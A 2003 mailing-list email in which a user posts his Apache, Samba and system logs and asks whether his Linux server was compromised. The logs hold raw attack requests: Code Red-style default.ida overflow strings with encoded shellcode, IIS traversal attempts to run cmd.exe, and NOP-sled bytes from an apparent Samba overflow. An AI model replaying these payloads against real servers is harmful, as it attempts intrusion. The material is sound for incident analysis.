Thanks for all the replies.
This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow caused some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker, eh, what is a cracker? And what is the difference between that and a hacker?
From: "Derek Fountain"
> Do you have any reason to believe a hardware fault has occurred? Any history of
> overheating with that box? Has it received a knock recently which might have
> dislodged some memory? Any reason to think the hard disk might have started
> to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
> A reinstall looks like the best option in the absence of any better advice. My
> suspicions would lie with the hardware though. Happily running Linux boxes
> don't just go belly up like that without a good reason.
I think that I will reinstall the machine.
Rohit writes:
> I would have looked at the /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge hole in the log, everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=, ctladdr= (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=31120, dsn=2.0.0, stat=Sent
Apr 29 09:50:09 linux sendmail-client[1040]: starting daemon (8.12.3): queueing@00:30:00
[/snip]
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time.
Here is a snip of that log:
[snip]
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT 193.109.122.7:2048/ HTTP/1.1" 400 340
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
[/snip]
Here is a snip from the samba log file (log.smbd).
I don't understand all of this but there was activity on April 21 around 18:00.
I don't recognise these ip addresses.
[snip]
[2003/04/21 18:04:16, 0] smbd/service.c:make_connection(249)
localhost (200.67.132.3) couldn't find service c
[2003/04/21 18:04:30, 0] smbd/service.c:make_connection(249)
localhost (80.24.226.55) couldn't find service c
[2003/04/21 18:18:39, 0] smbd/service.c:make_connection(249)
alevrius_ (200.56.254.70) couldn't find service c
[2003/04/21 18:20:24, 0] smbd/service.c:make_connection(249)
50163099sp (67.225.191.11) couldn't find service c
[2003/04/21 18:29:04, 0] smbd/service.c:make_connection(249)
50163099sp (62.56.130.23) couldn't find service c
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6353 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6354 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6355 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6356 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6360 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6371 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:52:16, 0] smbd/service.c:make_connection(249)
localhost (61.217.123.231) couldn't find service c
[/snip]
More log reading, this time messages - this log shuts down April 21 and starts up April 29 - a samba string overflow seems to have caused a shutdown.
[snip]
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
Apr 21 18:44:20 linux smbd[6373]: INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Apr 21 18:44:20 linux smbd[6373]: Please read the file BUGS.txt in the distribution
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
Apr 21 18:44:20 linux smbd[6373]: PANIC: internal error
Apr 21 18:44:20 linux smbd[6373]:
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 29 09:46:25 linux syslogd 1.3-0: restart.
Apr 29 09:46:36 linux sshd[844]: Server listening on :: port 22.
Apr 29 09:46:37 linux webmin[843]: Webmin starting
Apr 29 09:46:44 linux /etc/hotplug/net.agent[846]: No HW description found ... exiting
Apr 29 09:50:08 linux init: Switching to runlevel: 6
Apr 29 09:50:09 linux /usr/sbin/cron[1029]: (CRON) STARTUP (fork ok)
Apr 29 09:52:30 linux syslogd 1.3-0: restart.
Apr 29 09:52:41 linux sshd[843]: Server listening on :: port 22.
Apr 29 09:52:43 linux webmin[842]: Webmin starting
[/snip]
Thanks in advance for any advice.
Dan